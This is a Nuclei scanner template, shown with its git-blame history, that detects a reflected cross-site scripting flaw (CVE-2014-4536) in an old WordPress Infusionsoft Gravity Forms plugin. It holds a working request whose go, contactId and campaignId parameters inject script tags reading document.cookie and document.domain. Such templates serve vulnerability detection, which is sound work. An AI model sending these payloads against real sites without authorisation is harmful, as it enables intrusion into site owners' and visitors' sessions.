nuclei-templates/cves/2014/CVE-2014-4536.yaml

id: CVE-2014-4536

info:
  name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
  author: daffainfo
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4536
  tags: cve,cve2014,wordpress,wp-plugin,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2014-4536
    cwe-id: CWE-79
  description: "Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"></script><script>alert(document.domain)</script>'
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/02/24
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00			`id: CVE-2014-4536`

			`info:`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00			`author: daffainfo`
			`severity: medium`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:59:12 +00:00			`reference:`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00			`- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f`
			`- https://nvd.nist.gov/vuln/detail/CVE-2014-4536`
			`tags: cve,cve2014,wordpress,wp-plugin,xss`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.10`
			`cve-id: CVE-2014-4536`
			`cwe-id: CWE-79`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00			`description: "Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2014-4536.yaml 2021-07-31 03:13:27 +00:00			`- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Update CVE-2014-4536.yaml 2021-07-31 03:13:27 +00:00			`- '"></script><script>alert(document.domain)</script>'`
Create CVE-2014-4536.yaml 2021-07-30 23:01:46 +00:00			`part: body`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`
Dashboard Text Enhancements (#3773) Dashboard Text Enhancements 2022-02-25 14:32:23 +00:00
			`# Enhanced by mp on 2022/02/24`